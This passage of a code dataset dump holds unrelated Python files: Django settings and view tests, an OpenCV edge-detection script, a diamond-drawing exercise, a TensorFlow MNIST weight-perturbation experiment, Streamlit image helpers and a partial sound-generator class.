    chars = 'abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)'\n    secret = get_random_string(50, chars)\n    with open(os.path.join(SETTINGS_DIR, 'secret_key.py'), 'w') as f:\n        f.write('SECRET_KEY = \"' + secret + '\"')\n    from secret_key import *\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n    'django.contrib.admin',\n    'django.contrib.auth',\n    'django.contrib.contenttypes',\n    'django.contrib.sessions',\n    'django.contrib.messages',\n    'django.contrib.staticfiles',\n    'challenge',\n)\n\nMIDDLEWARE_CLASSES = (\n    'django.contrib.sessions.middleware.SessionMiddleware',\n    'django.middleware.common.CommonMiddleware',\n    'django.middleware.csrf.CsrfViewMiddleware',\n    'django.contrib.auth.middleware.AuthenticationMiddleware',\n    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n    'django.contrib.messages.middleware.MessageMiddleware',\n    'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'anniv.urls'\n\nWSGI_APPLICATION = 'anniv.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n    'default': {\n        'ENGINE': 'django.db.backends.sqlite3',\n        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n    }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'America/New_York'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nTEMPLATE_DIRS = (\n    # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n    # Always use forward slashes, even on Windows.\n    # Don't forget to use absolute paths, not relative paths.\n    'anniv/templates',\n)\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\nSTATICFILES_DIRS = (\n    # Put strings here, like \"/home/html/static\" or \"C:/www/django/static\".\n    # Always use forward slashes, even on Windows.\n    # Don't forget to use absolute paths, not relative paths.\n    os.path.join(BASE_DIR, 'static'),\n)\n\nSTATIC_URL = '/static/'\n\nLOGIN_REDIRECT_URL = '/'\nLOGIN_URL = 'django.contrib.auth.views.login'\n","sub_path":"anniv/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
+{"seq_id":"267275669","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread('messi.jpg',0)\nedges = cv2.Canny(img, 120, 150)\n\ncv2.imshow('original', img)\ncv2.imshow('canny', edges)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"image processing/canny edge detection/canny.py","file_name":"canny.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
+{"seq_id":"239880949","text":"#Name / Student ID (NIM) : Faishal Zharfan / 16519278\r\n#Problem : problem 2\r\n#Date : 26-03-2020\r\n\r\n# Program BelahKetupat (draws a diamond)\r\n# Input: N : integer\r\n# Output: if N > 0 and odd, draw a diamond according to N\r\n# otherwise, show an error message\r\n# DICTIONARY\r\n# Variables\r\n# N : int\r\n\r\n
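# A worked example of the spec above (expected output for N = 5):\r\n#\r\n#   *\r\n#  ***\r\n# *****\r\n#  ***\r\n#   *\r\n\r\n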
def GambarBelahKetupat(N):\r\n# I.S. N > 0 and N odd\r\n# F.S. a diamond whose horizontal diagonal has length N has been drawn,\r\n# following the problem specification\r\n# Complete the local dictionary and the algorithm of the procedure below\r\n# LOCAL DICTIONARY\r\n# N : int\r\n\r\n    array = [[' ' for j in range(N)] for i in range(N)]\r\n\r\n    for i in range(int((N+1)/2)):\r\n        for j in range(int((N-(2*i+1))/2), int((N+(2*i+1))/2)):\r\n            array[i][j] = '*'\r\n\r\n    for i in range(int((N+1)/2), N):\r\n        for j in range(int((2*i+2)/2)-int((N+1)/2), N-int((N+1)/2)+(N-i)):\r\n            array[i][j] = '*'\r\n\r\n    for i in range(int((N+1)/2)-1):\r\n        for j in range(int((N+(2*i+1))/2), N):\r\n            array[i][j] = ''\r\n\r\n    for i in range(int((N+1)/2), N):\r\n        for j in range(N-int((N+1)/2)+(N-i), N):\r\n            array[i][j] = ''\r\n\r\n    for i in range(N):\r\n        for j in range(N):\r\n            print(array[i][j], end='')\r\n        print()\r\n\r\n\r\ndef IsValid(N):\r\n# returns True if N is positive and odd, False otherwise\r\n# Complete the local dictionary and the algorithm of the function below\r\n# LOCAL DICTIONARY\r\n# N : int\r\n\r\n    if N > 0 and N % 2 == 1:\r\n        return True\r\n    else:\r\n        return False\r\n\r\n# MAIN PROGRAM ALGORITHM\r\nN = int(input())\r\nif (IsValid(N)):  # complete with a call to the IsValid function\r\n    GambarBelahKetupat(N)  # complete with a call to the GambarBelahKetupat procedure\r\nelse:  # N is not positive or N is not odd\r\n    print(\"Invalid input\")","sub_path":"belahketupat.py","file_name":"belahketupat.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
+{"seq_id":"405248011","text":"from django.urls import reverse\n\nfrom django_webtest import WebTest\n\nfrom accounts.tests.factories import UserFactory\nfrom directory.tests.factories import OrganisationFactory\nfrom pages.tests.factories import PageFactory\nfrom resources.choices import RESOURCE_APPROVED\nfrom resources.models import Resource\n\nfrom .factories import ResourceCategoryFactory, ResourceCategoryFeaturedFactory, ResourceFactory\n\n\nclass ResourceThankTestView(WebTest):\n\n    def setUp(self):\n        PageFactory.create(url='/resources/thank-you/')\n\n    def test_view(self):\n        response = self.app.get(reverse('resources:resource-thank-you'))\n        self.assertEqual(response.status_code, 200)\n\n\nclass ResourceUpdateTestView(WebTest):\n\n    def setUp(self):\n        self.organisation = OrganisationFactory.create()\n        self.resource_category = ResourceCategoryFactory.create()\n        self.resource = ResourceFactory.create(\n            status=RESOURCE_APPROVED,\n            organisation=self.organisation,\n        )\n        self.user = UserFactory.create()\n\n    def test_view_no_auth(self):\n        response = self.app.get(\n            reverse('resources:resource-update', kwargs={'slug': self.resource.slug})\n        )\n        self.assertEqual(response.status_code, 302)\n\n    def test_view_with_auth_random(self):\n        response = self.app.get(\n            reverse('resources:resource-update', kwargs={'slug': self.resource.slug}),\n            user=self.user,\n            expect_errors=True,\n        )\n        self.assertEqual(response.status_code, 403)\n\n    def test_view_with_auth(self):\n        response = self.app.get(\n            reverse('resources:resource-update', kwargs={'slug': self.resource.slug}),\n            user=self.resource.created_by,\n        )\n        form = response.form\n        self.assertEqual(response.status_code, 200)\n        self.assertEqual(form.fields['title'][0].value, self.resource.title)\n\n    def test_submit_form(self):\n        self.resource.created_by.approved_organisations.add(self.organisation)\n        response = self.app.get(\n            reverse('resources:resource-update', kwargs={'slug': self.resource.slug}),\n            
user=self.resource.created_by,\n )\n form = response.form\n form['categories'] = self.resource_category\n form['abstract'] = 'testing'\n response = form.submit()\n self.resource.refresh_from_db()\n\n self.assertEqual(self.resource.abstract, 'testing')\n self.assertEqual(response.status_code, 302)\n\n\nclass ResourceCreateViewViewTest(WebTest):\n\n def setUp(self):\n self.user = UserFactory.create(\n approved_organisations=OrganisationFactory.create_batch(size=10)\n )\n self.resource_category = ResourceCategoryFactory.create()\n self.initial = {\n 'title': 'test',\n 'abstract': 'abstract',\n 'content': 'content',\n }\n\n def test_view_no_auth(self):\n response = self.app.get(reverse('resources:resource-create'))\n self.assertEqual(response.status_code, 302)\n\n def test_view_public(self):\n response = self.app.get(reverse('resources:resource-create'), user=self.user)\n organisation = self.user.approved_organisations.all()[0]\n form = response.form\n for name, field in form.fields.items():\n if self.initial.get(name):\n field[0].value = self.initial[name]\n form['is_public'] = True\n form['categories'] = self.resource_category\n form['organisation'] = str(organisation.id)\n response = form.submit()\n\n resource = Resource.objects.get(title='test')\n\n self.assertEqual(response.status_code, 302)\n self.assertEqual(resource.organisation_id, organisation.id)\n self.assertFalse(resource.privacy.exists())\n\n def test_not_public(self):\n response = self.app.get(reverse('resources:resource-create'), user=self.user)\n organisation = self.user.approved_organisations.all()[0]\n form = response.form\n for name, field in form.fields.items():\n if self.initial.get(name):\n form[name].value = self.initial[name]\n form['is_public'] = False\n form['categories'] = self.resource_category\n form['organisation'] = str(organisation.id)\n response = form.submit()\n\n resource = Resource.objects.get(title='test')\n self.assertEqual(resource.privacy.count(), self.user.approved_organisations.count())\n\n\nclass ResourceDetailViewTest(WebTest):\n\n def test_resource_doesnot_exist(self):\n response = self.app.get(reverse('resources:resource-detail', kwargs={'slug': 'cat'}))\n self.assertEqual(response.location, reverse('home'))\n\n def test_resource_exist_no_access(self):\n organisation = OrganisationFactory.create()\n resource = ResourceFactory.create(\n slug='testing',\n status=RESOURCE_APPROVED,\n organisation=organisation,\n privacy=[organisation],\n )\n response = self.app.get(\n reverse('resources:resource-detail', kwargs={'slug': resource.slug})\n )\n url = '{url}?next={next}'.format(\n url=reverse('accounts:login'),\n next=resource.get_absolute_url(),\n )\n self.assertEqual(response.location, url)\n\n def test_resource_detail(self):\n organisation = OrganisationFactory.create()\n resource = ResourceFactory.create(\n slug='testing',\n status=RESOURCE_APPROVED,\n organisation=organisation,\n privacy=[organisation],\n )\n user = UserFactory.create(\n approved_organisations=[resource.organisation],\n )\n response = self.app.get(\n reverse('resources:resource-detail', kwargs={'slug': resource.slug}), user=user\n )\n self.assertEqual(response.status_code, 200)\n\n\nclass ResourceCategoryDetailView(WebTest):\n\n def setUp(self):\n self.organisation = OrganisationFactory.create()\n self.resource_category = ResourceCategoryFactory.create()\n\n def test_view_response(self):\n response = self.app.get(\n reverse(\n 'resources:resource-category-detail', kwargs={'slug': self.resource_category.slug}\n ),\n )\n 
self.assertEqual(response.status_code, 200)\n\n def test_featured_resources_visible(self):\n resource = ResourceFactory.create(status=RESOURCE_APPROVED)\n ResourceCategoryFeaturedFactory.create(\n category=self.resource_category,\n resource=resource,\n )\n response = self.app.get(\n reverse(\n 'resources:resource-category-detail', kwargs={'slug': self.resource_category.slug}\n )\n )\n featured_resources = response.context['featured_resources']\n self.assertTrue(featured_resources.exists())\n\n def test_featured_resources_not_visible(self):\n resource = ResourceFactory.create(\n status=RESOURCE_APPROVED,\n organisation=self.organisation,\n privacy=[self.organisation],\n )\n ResourceCategoryFeaturedFactory.create(\n category=self.resource_category,\n resource=resource,\n )\n response = self.app.get(\n reverse(\n 'resources:resource-category-detail', kwargs={'slug': self.resource_category.slug}\n ),\n )\n featured_resources = response.context['featured_resources']\n self.assertFalse(featured_resources.exists())\n\n def test_featured_resources_visible_for_user(self):\n user = UserFactory.create(approved_organisations=[self.organisation])\n resource = ResourceFactory.create(\n status=RESOURCE_APPROVED,\n organisation=self.organisation,\n privacy=[self.organisation],\n )\n ResourceCategoryFeaturedFactory.create(\n category=self.resource_category,\n resource=resource,\n )\n response = self.app.get(\n reverse(\n 'resources:resource-category-detail', kwargs={'slug': self.resource_category.slug}\n ),\n user=user,\n )\n featured_resources = response.context['featured_resources']\n self.assertTrue(featured_resources.exists())\n\n\nclass TestResourceCategoryListView(WebTest):\n\n def test_empty_return_code(self):\n response = self.app.get(reverse('resource-category-list'))\n self.assertEqual(response.status_code, 200)\n","sub_path":"apps/resources/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":8528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"228720805","text":"# a, b = get_acc_for_gaussian_perturbed_logistic_model_MNIST_diag(.0, .3, const_multiplier=.1, record_tensorboard=False)\n# a, b = get_acc_for_gaussian_perturbed_logistic_model_MNIST(.0, .3, const_multiplier=.1, record_tensorboard=False)\n# a, b = get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(.02, .1, const_multiplier=0.005, record_tensorboard=False)\n# a, b = get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST_diag(.015, .03, const_multiplier=.005, record_tensorboard=False)\n# a, b = get_acc_for_gaussian_perturbed_logistic_model_MNIST(.015, .005, const_multiplier=.33)\n\n\ndef get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(mu, sigma=.1, const_multiplier=1., n_tot_iters=5000, n_fisher_iters=2000, record_tensorboard=False, regularizer_mode='hvp'):\n import tensorflow as tf\n from tensorflow.examples.tutorials.mnist import input_data\n from tensorflow.python.ops import gradients_impl\n import numpy as np\n tf.reset_default_graph()\n mnist = input_data.read_data_sets('/tmp/data', one_hot=True)\n\n x = tf.placeholder(tf.float32, shape = (None, 784), name='Inputs')\n y = tf.placeholder(tf.float32, shape = (None, 10), name='Labels')\n gamma = tf.placeholder(tf.float32, shape = (), name='reg_constant')\n nwts = 7840\n # wts = tf.get_variable('Weights',shape= (784,10), initializer = tf.random_normal_initializer(stddev=.001))\n w = tf.get_variable(name='w', shape=[784, 512], 
initializer=tf.contrib.layers.xavier_initializer())\n w2 = tf.get_variable(name='w2', shape = [512, 10], initializer = tf.contrib.layers.xavier_initializer())\n bias1 = tf.get_variable('bias1',shape= (512), initializer = tf.random_normal_initializer(stddev=.1))\n bias2 = tf.get_variable('bias2',shape= (10), initializer = tf.random_normal_initializer(stddev=.1))\n\n w_pert = tf.placeholder(tf.float32, shape=(784,512))\n w_pert2 = tf.placeholder(tf.float32, shape=(512,10))\n # 0.1000 0.1292 0.1668 0.2154 0.2783 0.3594 0.4642 0.5995 0.7743 1.0000\n\n # w_pert = tf.stop_gradient(w + shift_pctage*w)\n perturbation = tf.stop_gradient(w - w_pert)\n perturbation2 = tf.stop_gradient(w2 - w_pert2)\n\n\n layer_1_out = tf.nn.relu(tf.matmul(x, w) + bias1)\n\n logits = tf.matmul(layer_1_out, w2) + bias2\n y_ = tf.nn.softmax(logits)\n correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))\n accuracy = tf.stop_gradient(tf.reduce_mean(tf.cast(correct_prediction, tf.float32)))\n\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels = y, logits = logits))\n\n\n optimizer = tf.train.AdamOptimizer()\n ce_grads = tf.gradients(loss, [w, w2, bias1,bias2])\n ce_grads_w1 = ce_grads[0]\n ce_grads_w2 = ce_grads[1]\n\n\n\n # print(vars)\n tf.summary.histogram('weights1', w)\n tf.summary.histogram('weights2', w2)\n tf.summary.histogram('pertweights1', w_pert)\n tf.summary.histogram('pertweights2', w_pert2)\n\n if regularizer_mode == 'hvp_adam':\n train_op = optimizer.apply_gradients(zip(ce_grads, [w, w2, bias1, bias2]))\n hvp1 = gradients_impl._hessian_vector_product(loss, [w], [perturbation])\n hvp2 = gradients_impl._hessian_vector_product(loss, [w2], [perturbation2])\n\n diag_load_amt1 = gamma * .005 * perturbation\n diag_load_amt2 = gamma * .005 * perturbation2\n\n reg_grad1 = gamma * 2.0 * hvp1 + diag_load_amt1\n reg_grad1 = tf.reshape(reg_grad1, tf.shape(w))\n reg_grad2 = gamma * 2.0 * hvp2 + diag_load_amt2\n reg_grad2 = tf.reshape(reg_grad2, tf.shape(w2))\n train_op_reg = optimizer.apply_gradients(zip([reg_grad1, reg_grad2], [w, w2]))\n\n elif regularizer_mode == 'diag_adam':\n train_op = optimizer.apply_gradients(zip(ce_grads, [w, w2, bias1, bias2]))\n vars = optimizer.variables()\n v_2 = vars[-1]\n v_1 = vars[-3]\n\n hvp1 = tf.multiply(v_1 ,perturbation)\n hvp2 = tf.multiply(v_2 ,perturbation2)\n\n diag_load_amt1 = gamma * .005 * perturbation\n diag_load_amt2 = gamma * .005 * perturbation2\n\n reg_grad1 = gamma * 2.0 * hvp1 + diag_load_amt1\n reg_grad1 = tf.reshape(reg_grad1, tf.shape(w))\n reg_grad2 = gamma * 2.0 * hvp2 + diag_load_amt2\n reg_grad2 = tf.reshape(reg_grad2, tf.shape(w2))\n train_op_reg = optimizer.apply_gradients(zip([reg_grad1, reg_grad2], [w, w2]))\n\n elif regularizer_mode == 'l2_adam':\n train_op = optimizer.apply_gradients(zip(ce_grads, [w, w2, bias1, bias2]))\n diag_load_amt1 = gamma * .005 * perturbation\n diag_load_amt2 = gamma * .005 * perturbation2\n\n reg_grad1 = diag_load_amt1\n reg_grad1 = tf.reshape(reg_grad1, tf.shape(w))\n reg_grad2 = diag_load_amt2\n reg_grad2 = tf.reshape(reg_grad2, tf.shape(w2))\n train_op_reg = optimizer.apply_gradients(zip([reg_grad1, reg_grad2], [w, w2]))\n\n elif regularizer_mode == 'hvp':\n diag_load_amt1 = gamma * .005 * perturbation\n diag_load_amt2 = gamma * .005 * perturbation2\n hvp1 = gradients_impl._hessian_vector_product(loss, [w], [perturbation])\n hvp2 = gradients_impl._hessian_vector_product(loss, [w2], [perturbation2])\n\n reg_grad1 = gamma * 2.0 * hvp1 + diag_load_amt1\n reg_grad1 = tf.reshape(reg_grad1, 
tf.shape(w))\n reg_grad2 = gamma * 2.0 * hvp2 + diag_load_amt2\n reg_grad2 = tf.reshape(reg_grad2, tf.shape(w2))\n tot_grads1 = ce_grads_w1 + reg_grad1\n tot_grads2 = ce_grads_w2 + reg_grad2\n train_op = optimizer.apply_gradients(zip([tot_grads1, tot_grads2, ce_grads[2], ce_grads[3]], [w, w2, bias1, bias2]))\n train_op_reg = tf.no_op()\n\n elif regularizer_mode == 'l2':\n diag_load_amt1 = gamma * .005 * perturbation\n diag_load_amt2 = gamma * .005 * perturbation2\n\n reg_grad1 = diag_load_amt1\n reg_grad1 = tf.reshape(reg_grad1, tf.shape(w))\n reg_grad2 = diag_load_amt2\n reg_grad2 = tf.reshape(reg_grad2, tf.shape(w2))\n tot_grads1 = ce_grads_w1 + reg_grad1\n tot_grads2 = ce_grads_w2 + reg_grad2\n train_op = optimizer.apply_gradients(zip([tot_grads1, tot_grads2, ce_grads[2], ce_grads[3]], [w, w2, bias1, bias2]))\n train_op_reg = tf.no_op()\n else:\n train_op = optimizer.apply_gradients(zip(ce_grads, [w, w2, bias1, bias2]))\n train_op_reg = tf.no_op()\n\n tf.summary.histogram('ce_gradient1', ce_grads_w1)\n tf.summary.histogram('ce_gradient2', ce_grads_w2)\n\n if const_multiplier>0.:\n print('USING REGULARIZATION')\n\n tf.summary.histogram('regularizer_gradient1', reg_grad1)\n tf.summary.histogram('regularizer_gradient2', reg_grad2)\n tf.summary.histogram('diagonal_load1', diag_load_amt1)\n tf.summary.histogram('diagonal_load2', diag_load_amt2)\n\n tf.summary.scalar('loss_gamma', gamma)\n else:\n print('NO REGULARIZATION')\n train_op_reg = tf.no_op()\n\n\n n_iters = n_tot_iters\n batch_size = 1024\n n_fisher_iters= n_fisher_iters\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.8)\n\n sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))\n\n if record_tensorboard:\n summary_writer = tf.summary.FileWriter('./logs/two_layer_zero_mean', sess.graph)\n summary_op = tf.summary.merge_all()\n\n lossval=[]\n accval=[]\n sess.run(tf.global_variables_initializer())\n\n regularizer_const=0.\n w_pert_ = np.zeros([784, 512])\n w_pert2_ = np.zeros([512, 10])\n\n for i in range(0, n_iters):\n x_batch, y_batch = mnist.train.next_batch(batch_size)\n if i<=(n_iters-n_fisher_iters):\n regularizer_const=0.\n else:\n regularizer_const=.1*const_multiplier\n\n _, __, l, acc, w_ = sess.run([train_op, train_op_reg, loss, accuracy, w,], feed_dict={x: x_batch, y: y_batch, gamma:regularizer_const, w_pert:w_pert_, w_pert2:w_pert2_})\n\n if record_tensorboard:\n summ, _, __, l, acc, w_ = sess.run([summary_op, train_op, train_op_reg, loss, accuracy, w], feed_dict={x: x_batch, y: y_batch, gamma:regularizer_const, w_pert:w_pert_, w_pert2:w_pert2_})\n\n if record_tensorboard:\n summary_writer.add_summary(summ, i)\n lossval.append(l)\n accval.append(acc)\n\n if i == n_iters-n_fisher_iters:\n print('SAVING OPTIMAL ML WEIGHTS FROM END OF TRAINING')\n w_, w2_ = sess.run([w, w2])\n\n if i >= n_iters-n_fisher_iters and regularizer_const>0.:\n w_pert_ = w_ + np.random.normal(mu, sigma, size = [784, 512])\n w_pert2_ = w2_ + np.random.normal(mu, sigma, size = [512, 10])\n\n if i == n_iters - 1:\n print('USING PERTURBATIONS ON WEIGHTS AT END OF ALL ITERATIONS')\n w_, w2_ = sess.run([w, w2])\n # w_pert_ = w_\n # w_pert2_ = w2_\n # w_pert_ = w_ + np.random.normal(mu, sigma, size = [784, 512])\n\n # w_pert2_ = w2_ + np.random.normal(mu, sigma, size = [512, 10])\n\n\n if i%200==0:\n print('\\nIteration: '+str(i)+'\\nAccuracy: '+str(acc)+'\\nLoss: '+str(l)+'\\n')\n\n regularizer_const = 0.\n\n # perturbed_test_set = mnist.test.images+np.random.normal(0.,stddev, np.shape(mnist.test.images))\n w_pert_ = w_ + 
np.random.normal(mu, sigma, size = [784, 512])\n w_pert2_ = w2_ + np.random.normal(mu, sigma, size = [512, 10])\n\n x_testcv = mnist.test.images\n y_testcv = mnist.test.labels\n x_cv = x_testcv[0:5000,:]\n x_test = x_testcv[5000:,:]\n\n y_cv = y_testcv[0:5000,:]\n y_test = y_testcv[5000:,:]\n up_acc = sess.run(accuracy, feed_dict={x: mnist.test.images, y: mnist.test.labels})\n print('UNPERTURBED Test accuracy %g' % up_acc)\n sess.run(tf.assign(w, w_pert), feed_dict={gamma:regularizer_const, w_pert:w_pert_, w_pert2: w_pert2_})\n sess.run(tf.assign(w2, w_pert2_), feed_dict={gamma:regularizer_const, w_pert:w_pert_, w_pert2: w_pert2_})\n\n pert_acc = sess.run(accuracy, feed_dict={x: mnist.test.images, y: mnist.test.labels, gamma:regularizer_const, w_pert:w_pert_, w_pert2:w_pert2_})\n # pert_acc = sess.run(accuracy, feed_dict={x: perturbed_test_set, y: mnist.test.labels})\n print('PERTURBED test accuracy %g' % pert_acc)\n # summary_writer.close()\n sess.close()\n\n return up_acc, pert_acc\n\n\n# a, b = get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(.02, .1, const_multiplier=0.00, n_tot_iters=7000, n_fisher_iters=2000, record_tensorboard=False, regularizer_mode='hvp_adam')\n# a, b = get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(.05, .1, const_multiplier=0.05, n_tot_iters=7000, n_fisher_iters=2000, record_tensorboard=False, regularizer_mode='hvp_adam')\n# a, b = get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(.005, .05, const_multiplier=0.00, n_tot_iters=7000, n_fisher_iters=2000, record_tensorboard=False, regularizer_mode='none')\n# a, b = get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(.01, .005, const_multiplier=.05, n_tot_iters=7000, n_fisher_iters=2000, record_tensorboard=False, regularizer_mode='none')\na, b = get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(.1, .005, const_multiplier=.05, n_tot_iters=7000, n_fisher_iters=2000, record_tensorboard=False, regularizer_mode='hvp_adam')\n# a, b = get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(.005, .0005, const_multiplier=0.0, n_tot_iters=7000, n_fisher_iters=2000, record_tensorboard=False, regularizer_mode='hvp_adam')\n# a, b = get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(.005, .0005, const_multiplier=0.5, n_tot_iters=7000, n_fisher_iters=2000, record_tensorboard=False, regularizer_mode='hvp_adam')\n# a, b = get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(.005, .05, const_multiplier=0.005, n_tot_iters=7000, n_fisher_iters=2000, record_tensorboard=False, regularizer_mode='hvp_adam')\n# a, b = get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(.02, .05, const_multiplier=0.005, n_tot_iters=7000, n_fisher_iters=2000, record_tensorboard=False, regularizer_mode='none')\n# a, b = get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(.2, .1, const_multiplier=0.0, n_tot_iters=7000, n_fisher_iters=2000, record_tensorboard=False, regularizer_mode='none')\n\n\n\n","sub_path":"delta_theta_models.py","file_name":"delta_theta_models.py","file_ext":"py","file_size_in_byte":12208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"307533875","text":"import os, sys, io\nimport streamlit as st\nimport numpy as np\nfrom PIL import Image\nimport urllib.request as urllib\n\ndef show_miro_logo(use_column_width = False, width = 100, st_asset= st.sidebar):\n\tlogo_url = 'https://miro.medium.com/max/1400/0*qLL-32srlq6Y_iTm.png'\n\tst_asset.image(logo_url, use_column_width = use_column_width, 
channels = 'BGR', format = 'PNG', width = width)\n\ndef file_selector(folder_path='.', st_asset = st, extension_tuple = None,\n\tstr_msg = \"Select a file\", get_dir = False):\n\t'''\n\tusing streamlit selectbox to return a filepath\n\t'''\n\tif not folder_path:\n\t\treturn None\n\telse:\n\t\tif not os.path.isdir(folder_path):\n\t\t\tst_asset.warning(f'`{folder_path}` is not a valid directory path')\n\t\t\treturn None\n\n\t\tfilenames = os.listdir(folder_path)\n\t\tif get_dir:\n\t\t\tfilenames = [f for f in filenames if os.path.isdir(os.path.join(folder_path, f))]\n\t\telif extension_tuple:\n\t\t\tfilenames = [f for f in filenames if f.endswith(extension_tuple) and os.path.isfile(os.path.join(folder_path, f))]\n\t\tselected_filename = st_asset.selectbox(str_msg, sorted(filenames))\n\t\treturn os.path.join(folder_path, selected_filename)\n\ndef get_image(st_asset = st.sidebar, as_np_arr = False, extension_list = ['jpg', 'jpeg', 'png']):\n\timage_url = st_asset.text_input(\"Enter Image URL\")\n\timage_fh = st_asset.file_uploader(label = \"Upload your image\", type = extension_list)\n\n\tif image_url and image_fh:\n\t\tst_asset.warning(f'image url takes precedence over uploaded image file')\n\n\tim = None\n\n\tif image_url:\n\t\tresponse = urllib.urlopen(image_url)\n\t\tim = Image.open(io.BytesIO(bytearray(response.read())))\n\telif image_fh:\n\t\tim = Image.open(image_fh)\n\n\tif im and as_np_arr:\n\t\tim = np.array(im)\n\treturn im\n","sub_path":"streamlit_demo/st_utils.py","file_name":"st_utils.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"343495870","text":"import os\nimport tensorflow as tf\nimport tsms\nfrom typing import Dict\nfrom tcvae import model, localconfig\nfrom tcvae.compute_measures import heuristic_names\nimport numpy as np\n\n\nclass SoundGenerator:\n _instance = None\n\n def __new__(cls, *args, **kwargs):\n if cls._instance is None:\n cls._instance = super(SoundGenerator, cls).__new__(cls)\n return cls._instance\n\n def __init__(self, config_path: str = None):\n assert os.path.isfile(config_path)\n self.config_path = config_path\n self.conf = localconfig.LocalConfig()\n self.conf.load_config_from_file(config_path)\n self.model = None\n # Prediction specific config\n self.conf.batch_size = 1\n self.measure_to_index = dict((n, i) for i, n in enumerate(heuristic_names))\n self.index_to_measure = dict((v, k) for k, v in self.measure_to_index.items())\n\n def load_model(self, checkpoint_path: str = None) -> None:\n assert os.path.isfile(checkpoint_path), f\"No checkpoint at {checkpoint_path}\"\n self.model = model.MtVae(self.conf)\n # ToDo - Add input shapes\n self.model.build([])\n self.model.load_weights(checkpoint_path)\n print(\"Model loaded\")\n\n def _get_mask(self, note_number):\n f0 = tsms.core.midi_to_f0_estimate(note_number, self.conf.frame_size,\n self.conf.frame_size)\n harmonics = tsms.core.get_number_harmonics(f0, self.conf.sample_rate)\n harmonics = np.squeeze(harmonics)\n mask = np.zeros((1, self.conf.harmonic_frame_steps, 110))\n mask[:, :, :harmonics] = np.ones((1, self.conf.harmonic_frame_steps, harmonics))\n return mask\n\n def _prepare_params(self, params: Dict) -> Dict:\n output = {}\n\n note_number = params.get(\"note_number\") or 60\n velocity = params.get(\"velocity\") or 50\n measures = params.get(\"measures\") or {}\n\n assert 40 <= note_number <= 88\n note_number -= self.conf.starting_midi_pitch\n updated_note = np.zeros((1, 
self.conf.num_pitches))\n updated_note[:, note_number] = 1.\n output[\"note_number\"] = updated_note\n\n assert 25 <= velocity <= 127\n velocity = int(velocity / 25 - 1)\n updated_vel = np.zeros((1, self.conf.num_velocities))\n updated_vel[:, velocity] = 1.\n output[\"velocity\"] = updated_vel\n\n updated_measures = [0.2] * self.conf.num_measures\n\n for m, val in measures.items():\n assert m in heuristic_names\n updated_measures[self.measure_to_index[m]] = val\n\n output[\"measures\"] = np.expand_dims(updated_measures, axis=0)\n\n if \"z\" in params:\n updated_z = params.get(\"z\")\n for val in updated_z:\n assert 0 <= val <= 1\n updated_z = np.expand_dims(updated_z, axis=0)\n assert updated_z.shape == (1, 16)\n output[\"z\"] = updated_z\n else:\n print(\"Updating z from random values\")\n output[\"z\"] = np.random.rand(1, 16)\n return output\n\n def _get_prediction(self, params: Dict, prediction: tf.Tensor) -> np.ndarray:\n params = params.copy()\n\n note_number = np.argmax(params[\"note_number\"], axis=-1) + self.conf.starting_midi_pitch\n transform = self.conf.data_handler.output_transform(prediction, pred=True)\n mask = self._get_mask(note_number)\n\n h_freq, h_mag, h_phase = self.conf.data_handler.denormalize(\n transform, mask, note_number)\n audio = tsms.core.harmonic_synthesis(\n h_freq, h_mag, h_phase, self.conf.sample_rate, self.conf.frame_size)\n return np.squeeze(audio.numpy())\n\n def get_prediction(self, params: Dict) -> np.ndarray:\n params = params.copy()\n\n params = self._prepare_params(params)\n prediction = self.model.decoder.predict(params)\n audio_pred = self._get_prediction(params, prediction=prediction)\n\n return 